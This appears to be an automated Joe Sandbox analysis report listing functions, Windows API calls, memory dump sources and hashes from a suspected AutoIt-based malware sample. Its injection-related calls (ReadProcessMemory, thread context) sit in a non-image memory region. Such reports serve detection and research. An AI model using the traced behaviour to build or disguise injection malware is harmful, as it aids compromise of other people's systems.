                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A69AAB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                • Instruction ID: 13b76642866bde31ac637a414db085ec3c3871494a7e864c63bcdbc1388d211b
                                                                                • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                • Instruction Fuzzy Hash: BD12DD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A
                                                                                Function 005EFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 947fb9c2903d2554480b0ab5b5a73afc4c96a0b58120a64f54d21fada5068f02
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 04310474A041499BD718CF5AD580969FFA2FF49300B7486A5E889CF651EB31EDC1CBC0
                                                                                Function 005D4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E9C
                                                                                  • Part of subcall function 005D4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005D4EAE
                                                                                  • Part of subcall function 005D4E90: FreeLibrary.KERNEL32(00000000,?,?,005D4EDD,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EC0
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4EFD
                                                                                  • Part of subcall function 005D4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E62
                                                                                  • Part of subcall function 005D4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005D4E74
                                                                                  • Part of subcall function 005D4E59: FreeLibrary.KERNEL32(00000000,?,?,00613CDE,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4E87
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                • API String ID: 2632591731-0
                                                                                • Opcode ID: bb99ae4b92fed511511bae20d61bb14f97f2b4dd1cb2d92242e43929cd4bc520
                                                                                • Instruction ID: 19d7db263839333eeb229c06171a97775e57494547dec6a4f4377c1662798597
                                                                                • Opcode Fuzzy Hash: bb99ae4b92fed511511bae20d61bb14f97f2b4dd1cb2d92242e43929cd4bc520
                                                                                • Instruction Fuzzy Hash: 1B119431610207ABDB34AB68D81ABAD7BA5BF80710F10442FF542A63E1EE749A459B51
                                                                                Function 00608402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                • Opcode ID: c09155578f7dfa56d7fad9625e3e360b0eca477f4fa75aee55e5ea8f5bdb493d
                                                                                • Instruction ID: 656de7eb35e5410caee334f0307ce157b6df157dbaaed7a70f5c5f51c8d63dc6
                                                                                • Opcode Fuzzy Hash: c09155578f7dfa56d7fad9625e3e360b0eca477f4fa75aee55e5ea8f5bdb493d
                                                                                • Instruction Fuzzy Hash: 1211067590410AAFCB09DF58E9419DB7BF5EF48314F144099F808AB352DA31EA118BA5
                                                                                Function 00605000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00604C7D: RtlAllocateHeap.NTDLL(00000008,005D1129,00000000,?,00602E29,00000001,00000364,?,?,?,005FF2DE,00603863,006A1444,?,005EFDF5,?), ref: 00604CBE
                                                                                • _free.LIBCMT ref: 0060506C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction ID: a22c3d20efab02afac13fee568ba4a89dce7c500d43d8873112c67219eb3724d
                                                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction Fuzzy Hash: F0014E722447055BE3358F55D84599FFBEEFB85370F25091DE186832C0EA306805CB74
                                                                                Function 005FE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction ID: db8acdf5fabf5a04d63d32f32ac4a39ce2eed5119d7a5437955293a2927511a0
                                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction Fuzzy Hash: 18F0F932510A1C9AC6353E65AC0AB7B3B99AF92330F100B19F621D71E2DF78980186A9
                                                                                Function 00604C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,005D1129,00000000,?,00602E29,00000001,00000364,?,?,?,005FF2DE,00603863,006A1444,?,005EFDF5,?), ref: 00604CBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 6a7b0931efb186a7febaad214bba5efb44fa32acf1e3b0a4d1c5afdf556a08f9
                                                                                • Instruction ID: 617a7ca275ac73957a99dff3d5920d621fc773557dd93191cffde9949225c3d6
                                                                                • Opcode Fuzzy Hash: 6a7b0931efb186a7febaad214bba5efb44fa32acf1e3b0a4d1c5afdf556a08f9
                                                                                • Instruction Fuzzy Hash: F7F0B47168222967FB395F629C09BAB3B8ABF817A0F144111FB19AA3C0CE71D80146E0
                                                                                Function 00603820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,006A1444,?,005EFDF5,?,?,005DA976,00000010,006A1440,005D13FC,?,005D13C6,?,005D1129), ref: 00603852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: ddd0821339011aced2ff01467d1f160748247d4867104de23ddb7ea312bd46a2
                                                                                • Instruction ID: 11215f2f0da3461671b56e8887a1666e65cb721e5df1eb3c9bed38f9b6a6e99c
                                                                                • Opcode Fuzzy Hash: ddd0821339011aced2ff01467d1f160748247d4867104de23ddb7ea312bd46a2
                                                                                • Instruction Fuzzy Hash: 64E0E53118023956D7252A669C04BEB3B4FAF837B2F0580A0FD06967C0CB11EE0186E1
                                                                                Function 005D4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,006A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 005D4F6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 5ce2f0d1ebfececc930fde42a29a8deb95b9ac4370c608bac1d2573b30fcc011
                                                                                • Instruction ID: 48263dd34edf05ba385d231c6e79eb695b4eb1e5163b4567b7fb78d2e802c220
                                                                                • Opcode Fuzzy Hash: 5ce2f0d1ebfececc930fde42a29a8deb95b9ac4370c608bac1d2573b30fcc011
                                                                                • Instruction Fuzzy Hash: 16F01571105792CFDB349F68E494822BFE4BF143293208D6FE2EA82721CB319844DF10
                                                                                Function 005D2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005D2DC4
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath_wcslen
                                                                                • String ID:
                                                                                • API String ID: 541455249-0
                                                                                • Opcode ID: 0097ed18f5fcd5e0266c1842e1ce6ddd872bd63becee797940c0150c19aa85a6
                                                                                • Instruction ID: a13fe42d67ad340a61d46bbdca8a8325bb38b7ccd026340ea5e2178f09086dc6
                                                                                • Opcode Fuzzy Hash: 0097ed18f5fcd5e0266c1842e1ce6ddd872bd63becee797940c0150c19aa85a6
                                                                                • Instruction Fuzzy Hash: 6FE0CD726041245BC720A2589C05FEA77DDDFC8790F044076FD09D7248D960AD818590
                                                                                Function 005D2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005D3908
                                                                                  • Part of subcall function 005DD730: GetInputState.USER32 ref: 005DD807
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 005D2B6B
                                                                                  • Part of subcall function 005D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 005D314E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                • String ID:
                                                                                • API String ID: 3667716007-0
                                                                                • Opcode ID: a6a509abe0165270b5b97a273e215bc3af865148040093a20621723132364f46
                                                                                • Instruction ID: bcf4d0495b20ef5818f58a4ff2710d013c4cc48e0a38da36660a5d673553c680
                                                                                • Opcode Fuzzy Hash: a6a509abe0165270b5b97a273e215bc3af865148040093a20621723132364f46
                                                                                • Instruction Fuzzy Hash: B9E0262130020606C724BB3CA81A5BDAF9AFBE7351F00143FF04287362CE644A454723
                                                                                Function 0061039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,00000000,?,00610704,?,?,00000000,?,00610704,00000000,0000000C), ref: 006103B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: e71153d4d028747fc7b47b461783ee3da38fdf25db6b64fa104a4b0db6e8b96e
                                                                                • Instruction ID: f0cb12b7a0ce7ada8c37dfe1dfb2e1a13e97d0723726b2afc167b080658274e3
                                                                                • Opcode Fuzzy Hash: e71153d4d028747fc7b47b461783ee3da38fdf25db6b64fa104a4b0db6e8b96e
                                                                                • Instruction Fuzzy Hash: E7D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000FE5856020C772E821AB90
                                                                                Function 005D1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 005D1CBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem
                                                                                • String ID:
                                                                                • API String ID: 3098949447-0
                                                                                • Opcode ID: d631d20c3c72c86bd71cb0f2f1dc98c1b1c6c064bca413cb01e26037720b5b5a
                                                                                • Instruction ID: e2681cfdeab473b499b1418a13bc9f2afd693b29750693276b1f4a8788b2605b
                                                                                • Opcode Fuzzy Hash: d631d20c3c72c86bd71cb0f2f1dc98c1b1c6c064bca413cb01e26037720b5b5a
                                                                                • Instruction Fuzzy Hash: C0C09B352C03059FF7145B84BC5AF107756B349B10F045001F649595E3C3E13430DE50
                                                                                Function 01A6A234 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 01A6A249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction ID: 83e3d0716b99a101e7aec5108a19d3c991f35023cfbb114648e9952381c31abf
                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                • Instruction Fuzzy Hash: 50E09A7498520DAFDB00DFA4D64969D7BB4EF04301F1005A1FD05A7690DA319A548A62
                                                                                Function 01A6A238 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 01A6A249
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1472344836.0000000001A67000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A67000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1a67000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction ID: 30185886b6b607bb097fef07573e5fd0d7da1486f3d2ea3ccd3a347c1815bbb7
                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                • Instruction Fuzzy Hash: 20E0E67498520DDFDB00DFB4D64969D7BB4EF04301F100161FD05E2280D6319D50CA62

                                                                                Non-executed Functions

                                                                                Function 00669576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0066961A
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066965B
                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0066969F
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006696C9
                                                                                • SendMessageW.USER32 ref: 006696F2
                                                                                • GetKeyState.USER32(00000011), ref: 0066978B
                                                                                • GetKeyState.USER32(00000009), ref: 00669798
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006697AE
                                                                                • GetKeyState.USER32(00000010), ref: 006697B8
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006697E9
                                                                                • SendMessageW.USER32 ref: 00669810
                                                                                • SendMessageW.USER32(?,00001030,?,00667E95), ref: 00669918
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0066992E
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00669941
                                                                                • SetCapture.USER32(?), ref: 0066994A
                                                                                • ClientToScreen.USER32(?,?), ref: 006699AF
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006699BC
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006699D6
                                                                                • ReleaseCapture.USER32 ref: 006699E1
                                                                                • GetCursorPos.USER32(?), ref: 00669A19
                                                                                • ScreenToClient.USER32(?,?), ref: 00669A26
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00669A80
                                                                                • SendMessageW.USER32 ref: 00669AAE
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00669AEB
                                                                                • SendMessageW.USER32 ref: 00669B1A
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00669B3B
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00669B4A
                                                                                • GetCursorPos.USER32(?), ref: 00669B68
                                                                                • ScreenToClient.USER32(?,?), ref: 00669B75
                                                                                • GetParent.USER32(?), ref: 00669B93
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00669BFA
                                                                                • SendMessageW.USER32 ref: 00669C2B
                                                                                • ClientToScreen.USER32(?,?), ref: 00669C84
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00669CB4
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00669CDE
                                                                                • SendMessageW.USER32 ref: 00669D01
                                                                                • ClientToScreen.USER32(?,?), ref: 00669D4E
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00669D82
                                                                                  • Part of subcall function 005E9944: GetWindowLongW.USER32(?,000000EB), ref: 005E9952
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00669E05
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                • String ID: @GUI_DRAGID$F$p#j
                                                                                • API String ID: 3429851547-1181617611
                                                                                • Opcode ID: 19e942869c6cb140afbd5c03c2b694ffe63c86858c4295d3ae0502359f5c12b1
                                                                                • Instruction ID: 76b4e8e7a6f002470a5f916bf52aef33fcda7fc855f57752bac42c813ef11c91
                                                                                • Opcode Fuzzy Hash: 19e942869c6cb140afbd5c03c2b694ffe63c86858c4295d3ae0502359f5c12b1
